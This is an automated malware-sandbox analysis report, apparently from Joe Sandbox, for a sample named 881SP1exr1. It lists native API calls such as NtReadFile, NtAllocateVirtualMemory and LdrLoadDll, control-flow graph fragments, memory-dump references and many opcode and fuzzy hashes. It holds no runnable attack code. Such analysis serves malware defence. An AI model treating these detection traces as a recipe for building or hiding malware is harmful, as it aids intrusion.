                                                                                                                control_flow_graph 8 41a3d0-41a419 call 41af20 NtReadFile
                                                                                                                APIs
                                                                                                                • NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A415
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1699340438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_400000_881SP1exr1.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FileRead
                                                                                                                • String ID: !JA$bMA$bMA
                                                                                                                • API String ID: 2738559852-4222312340
                                                                                                                • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                • Instruction ID: 54437c4e75339082d0912fbe7e6c9053912bd6928cda1a9760da43cab1c95c7d
                                                                                                                • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                • Instruction Fuzzy Hash: C3F0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241D630E8518BA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 307 40ace0-40ad09 call 41cc10 311 40ad0b-40ad0e 307->311 312 40ad0f-40ad1d call 41d030 307->312 315 40ad2d-40ad3e call 41b460 312->315 316 40ad1f-40ad2a call 41d2b0 312->316 321 40ad40-40ad54 LdrLoadDll 315->321 322 40ad57-40ad5a 315->322 316->315 321->322
                                                                                                                APIs
                                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD52
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1699340438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_400000_881SP1exr1.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Load
                                                                                                                • String ID:
                                                                                                                • API String ID: 2234796835-0
                                                                                                                • Opcode ID: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                                                                                                                • Instruction ID: 93036d1b31c8ba6342ae8de3f2893f5930aff37f33252288d1eb8296453bc5b5
                                                                                                                • Opcode Fuzzy Hash: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                                                                                                                • Instruction Fuzzy Hash: FF015EB5E0020DABDB10EBA1DC42FDEB3789F14308F0041AAE908A7281F634EB54CB95
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 323 41a320-41a336 324 41a33c-41a371 NtCreateFile 323->324 325 41a337 call 41af20 323->325 325->324
                                                                                                                APIs
                                                                                                                • NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A36D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1699340438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_400000_881SP1exr1.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 823142352-0
                                                                                                                • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                • Instruction ID: 30690d9e011530b668ed3b4ae7cc5c3fda29d367b226dbf4f68f65ca016a7565
                                                                                                                • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                • Instruction Fuzzy Hash: FDF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 326 41a31b-41a371 call 41af20 NtCreateFile
                                                                                                                APIs
                                                                                                                • NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A36D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1699340438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_400000_881SP1exr1.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 823142352-0
                                                                                                                • Opcode ID: 10e2313bae08c4ea56f4ec5b6a294a75bc6ffca9dc3441b5507330e58ac5edb4
                                                                                                                • Instruction ID: d6a5240eb07b507b895d18ca407b66409a8d8d5b7c24692f6b929a3d25f7b8d7
                                                                                                                • Opcode Fuzzy Hash: 10e2313bae08c4ea56f4ec5b6a294a75bc6ffca9dc3441b5507330e58ac5edb4
                                                                                                                • Instruction Fuzzy Hash: BAF0B2B6205108AFDB08CF88DC95EEB77AEEF8C314F158249BA0997255C630E811CBA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 329 41a4fb-41a53d call 41af20 NtAllocateVirtualMemory
                                                                                                                APIs
                                                                                                                • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B0F4,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A539
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1699340438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_400000_881SP1exr1.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateMemoryVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 2167126740-0
                                                                                                                • Opcode ID: 9ffc64b18df28b0ef6e7fe51342331a4b0ad2a26d2f95324d3bee179bf33f0a4
                                                                                                                • Instruction ID: 2ef9bb699a7018c9cc7bc6d29dae641287fc63af95c3dd5d89fb187e99bc2b81
                                                                                                                • Opcode Fuzzy Hash: 9ffc64b18df28b0ef6e7fe51342331a4b0ad2a26d2f95324d3bee179bf33f0a4
                                                                                                                • Instruction Fuzzy Hash: 5AF01CB2200108BFDB14DF99DC81EEB77ADEF88354F158249FE0997241C634E811CBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 332 41a500-41a516 333 41a51c-41a53d NtAllocateVirtualMemory 332->333 334 41a517 call 41af20 332->334 334->333
                                                                                                                APIs
                                                                                                                • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B0F4,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A539
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1699340438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_400000_881SP1exr1.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateMemoryVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 2167126740-0
                                                                                                                • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                • Instruction ID: c35769ceed384df61eeb5fc049e905e887b244236103aac277853e7772ac0dd9
                                                                                                                • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                • Instruction Fuzzy Hash: 75F015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241C630F811CBA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A475
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1699340438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_400000_881SP1exr1.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Close
                                                                                                                • String ID:
                                                                                                                • API String ID: 3535843008-0
                                                                                                                • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                • Instruction ID: e48275ca6f7768b9f0fd4fab79f6d7fda959a909e55c262f35bdb2090c9231ed
                                                                                                                • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                • Instruction Fuzzy Hash: E5D01776200214ABD710EB99DC85EE77BADEF48764F15449ABA189B242C530FA1086E0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 68abd4e43f35f40b9bf9a0c9ef549d7780a459e84738ae880e48ff5ddcfaded9
                                                                                                                • Instruction ID: d2ab5cf6babb9ffa6b16833b138d4d651ab981ef890f0227aa643cceed73eda2
                                                                                                                • Opcode Fuzzy Hash: 68abd4e43f35f40b9bf9a0c9ef549d7780a459e84738ae880e48ff5ddcfaded9
                                                                                                                • Instruction Fuzzy Hash: 5F9002E12025010341057158441461A410E97F0205B55C022E5014591DC63589916226
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 43408025ec9f67fe79ddbd4ae021fd4803b8f55fdab94c955e0def99aaab4b35
                                                                                                                • Instruction ID: 60075eef5d1c64529c13ba140d930b41958a9ce812f3b16de652da058fee247f
                                                                                                                • Opcode Fuzzy Hash: 43408025ec9f67fe79ddbd4ae021fd4803b8f55fdab94c955e0def99aaab4b35
                                                                                                                • Instruction Fuzzy Hash: AE9002B120150902D1807158440464E010997E1305F95C016A4025655DCB258B5977A2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 5a58e0f9017568956423b5e2e51bb221d1a2918812405a386025b56dcaa2dbab
                                                                                                                • Instruction ID: 983b74d2ca94cb6b59fbc0834b7fefc333f8f7d4c0e13f0ebcfb1c89d0cee6d8
                                                                                                                • Opcode Fuzzy Hash: 5a58e0f9017568956423b5e2e51bb221d1a2918812405a386025b56dcaa2dbab
                                                                                                                • Instruction Fuzzy Hash: 239002A5211501030105B558070450B014A97E5355355C022F5015551CD73189615222
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 51b2943944a4c23ea4b351c00350920df82e31b9c599737c90af1cc27d82e471
                                                                                                                • Instruction ID: a7c9ba97737ce9c5359a4082fde949b9674cb49a442d1e5cd0dfbb3f64f8a805
                                                                                                                • Opcode Fuzzy Hash: 51b2943944a4c23ea4b351c00350920df82e31b9c599737c90af1cc27d82e471
                                                                                                                • Instruction Fuzzy Hash: AF9002A921350102D1807158540860E010997E1206F95D416A4015559CCA2589695322
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: ed3b3d972b51d557131e837271818922399800dfaa3d69dd054e03518d34e499
                                                                                                                • Instruction ID: 8d3a5677c341edd2e566573d4d8add4c1cb3e6e16a8bdb311be6e7d2f8aeb29b
                                                                                                                • Opcode Fuzzy Hash: ed3b3d972b51d557131e837271818922399800dfaa3d69dd054e03518d34e499
                                                                                                                • Instruction Fuzzy Hash: 529002A130150103D1407158541860A4109E7F1305F55D012E4414555CDA2589565323
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 2a83404722ec31f56c5662d8cb8723fbcf611c5317db691ec3d4a903b7b52a7e
                                                                                                                • Instruction ID: 4aa38aab5e9490b283b8a7e108762c197bd84a1b685327136fe6f039bd5ac4bf
                                                                                                                • Opcode Fuzzy Hash: 2a83404722ec31f56c5662d8cb8723fbcf611c5317db691ec3d4a903b7b52a7e
                                                                                                                • Instruction Fuzzy Hash: 5E9002A1242542525545B158440450B410AA7F0245795C013A5414951CC6369956D722
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: fd3802c29216df61fa2ead2bc1e43048f56c76d12dbcbf78a56c8c28a2bcaa1b
                                                                                                                • Instruction ID: c8116c9872de0c67db5ad6d0c23528e9601cf2ebf2d3c05170d94e840a021bbb
                                                                                                                • Opcode Fuzzy Hash: fd3802c29216df61fa2ead2bc1e43048f56c76d12dbcbf78a56c8c28a2bcaa1b
                                                                                                                • Instruction Fuzzy Hash: 019002B120150513D1117158450470B010D97E0245F95C413A4424559DD7668A52A222
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: ceb69aaae140e2809fe2663593214f9ff053ccae63032c50a613b7a2829541ad
                                                                                                                • Instruction ID: 095143e3fa11c534623ab14ab6db07b929459e1d01504fb7537e139426605543
                                                                                                                • Opcode Fuzzy Hash: ceb69aaae140e2809fe2663593214f9ff053ccae63032c50a613b7a2829541ad
                                                                                                                • Instruction Fuzzy Hash: 909002B120158902D1107158840474E010997E0305F59C412A8424659DC7A589917222
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: ef2ffee506b5d79f6e03e1ee4df1cc8cb61bd157fb6ffda33e56cf54298fecb7
                                                                                                                • Instruction ID: 225a0088e3fbf3017018ce149ca52a8a755e0cf64bf1943a35852d0bfd79b501
                                                                                                                • Opcode Fuzzy Hash: ef2ffee506b5d79f6e03e1ee4df1cc8cb61bd157fb6ffda33e56cf54298fecb7
                                                                                                                • Instruction Fuzzy Hash: D79002B120150502D1007598540864A010997F0305F55D012A9024556EC77589916232
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: dedbe1964203dc16ad13de525c74b5c9c5d29691658b0a41dc700161879e7c7e
                                                                                                                • Instruction ID: 575254d35fefd43d6f54a91f3d009e682256137436837263f8629a43da88be2b
                                                                                                                • Opcode Fuzzy Hash: dedbe1964203dc16ad13de525c74b5c9c5d29691658b0a41dc700161879e7c7e
                                                                                                                • Instruction Fuzzy Hash: DA9002E134150542D10071584414B0A0109D7F1305F55C016E5064555DC729CD526227
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 283bb0177a72f232ab87764f68277d89f2cd8e83e0965ae6e4539dbb704c61dc
                                                                                                                • Instruction ID: 45cee733211ca394137505d45d3676e4333030dba30ef93d6e8c96b46546a7b1
                                                                                                                • Opcode Fuzzy Hash: 283bb0177a72f232ab87764f68277d89f2cd8e83e0965ae6e4539dbb704c61dc
                                                                                                                • Instruction Fuzzy Hash: 399002A1211D0142D20075684C14B0B010997E0307F55C116A4154555CCA2589615622
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 98618b6ed320a4ec38c5b0aa8bf27af41aa4d73d21bc38a6ce110200a3c49cbd
                                                                                                                • Instruction ID: d654b51234b5230ce7814a2c044284e5a0fb902d1e1f298268d372c9ffab73eb
                                                                                                                • Opcode Fuzzy Hash: 98618b6ed320a4ec38c5b0aa8bf27af41aa4d73d21bc38a6ce110200a3c49cbd
                                                                                                                • Instruction Fuzzy Hash: 649002B120190502D1007158481470F010997E0306F55C012A5164556DC73589516672
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 171b0d9b960d01de78ba5a23298ea3520a5ed14a83af76bd68ba7b005bd1d72e
                                                                                                                • Instruction ID: 944b2d35ca55f4a97c02bf74ce477a499c1029ed79882186760641d42dc5d15d
                                                                                                                • Opcode Fuzzy Hash: 171b0d9b960d01de78ba5a23298ea3520a5ed14a83af76bd68ba7b005bd1d72e
                                                                                                                • Instruction Fuzzy Hash: 519002A16015014241407168884490A4109BBF1215755C122A4998551DC66989655766
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: deb15c1dd8d82109118d8d1b6d8d6258bb7f5590c99ffae769fd6684a7e3765c
                                                                                                                • Instruction ID: 725924024a19bdacba00d78d0b971976b1f2510431ea93c62c24361895b92692
                                                                                                                • Opcode Fuzzy Hash: deb15c1dd8d82109118d8d1b6d8d6258bb7f5590c99ffae769fd6684a7e3765c
                                                                                                                • Instruction Fuzzy Hash: 7D9002A160150602D1017158440461A010E97E0245F95C023A5024556ECB358A92A232
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 836b37daa4e40278ffd2b64c6f7f3dc715531c8f2cd4be18ab680e21cb883ef4
                                                                                                                • Instruction ID: 4d27b645369acc53c8acd02fea097b0b8e8c0bdd9f3e8d04d3fb2f4f715cc752
                                                                                                                • Opcode Fuzzy Hash: 836b37daa4e40278ffd2b64c6f7f3dc715531c8f2cd4be18ab680e21cb883ef4
                                                                                                                • Instruction Fuzzy Hash: 6E9002F120150502D1407158440474A010997E0305F55C012A9064555EC7698ED56766
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1699340438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_400000_881SP1exr1.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 853c01b66d24f589df6b89bde03758f04558a5ab365de05a0f584bb7a63a4c44
                                                                                                                • Instruction ID: 4f20240aff7f2371bb6e5cfcebb6b85206ba00274494e6c7b70a30fa46eb6871
                                                                                                                • Opcode Fuzzy Hash: 853c01b66d24f589df6b89bde03758f04558a5ab365de05a0f584bb7a63a4c44
                                                                                                                • Instruction Fuzzy Hash: 48213CB2D4420957CB25D664AD52BFF737CAB54314F04007FE949A3182F638BF498BA6
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 11 41a622-41a623 12 41a625-41a626 11->12 13 41a605-41a607 call 41af20 12->13 14 41a628-41a62b 12->14 19 41a60c-41a621 RtlAllocateHeap 13->19 15 41a600-41a604 14->15 16 41a62d-41a62e 14->16 15->13 16->12 18 41a630-41a647 call 41af20 16->18 21 41a64c-41a661 RtlFreeHeap 18->21
                                                                                                                APIs
                                                                                                                • RtlAllocateHeap.NTDLL(&EA,?,00414C9F,00414C9F,?,00414526,?,?,?,?,?,00000000,00409CE3,?), ref: 0041A61D
                                                                                                                • RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A65D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1699340438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_400000_881SP1exr1.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Heap$AllocateFree
                                                                                                                • String ID: &EA
                                                                                                                • API String ID: 2488874121-1330915590
                                                                                                                • Opcode ID: 4f5adb6c090d9f761aca899f227854bbc978f19403b4f5599b7088d3ffef287d
                                                                                                                • Instruction ID: b25da64d1c7be17a64bc07fb75e183af267272aa4b857870772045b2d45b8ee9
                                                                                                                • Opcode Fuzzy Hash: 4f5adb6c090d9f761aca899f227854bbc978f19403b4f5599b7088d3ffef287d
                                                                                                                • Instruction Fuzzy Hash: D9018BB52012146FCB20EF65DC44DEB776CEF84328B05865AF94957282C634EC61CBF5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 22 41a5f0-41a621 call 41af20 RtlAllocateHeap
                                                                                                                APIs
                                                                                                                • RtlAllocateHeap.NTDLL(&EA,?,00414C9F,00414C9F,?,00414526,?,?,?,?,?,00000000,00409CE3,?), ref: 0041A61D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1699340438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_400000_881SP1exr1.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap
                                                                                                                • String ID: &EA
                                                                                                                • API String ID: 1279760036-1330915590
                                                                                                                • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                • Instruction ID: 65e1271fa0e6f293e5ca7d904ec396d69fb6d51de338ced040ab1bfa87458b74
                                                                                                                • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                • Instruction Fuzzy Hash: 1DE012B2200208ABDB14EF99DC41EA777ADAF88668F118559BA085B242C630F9118AB0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
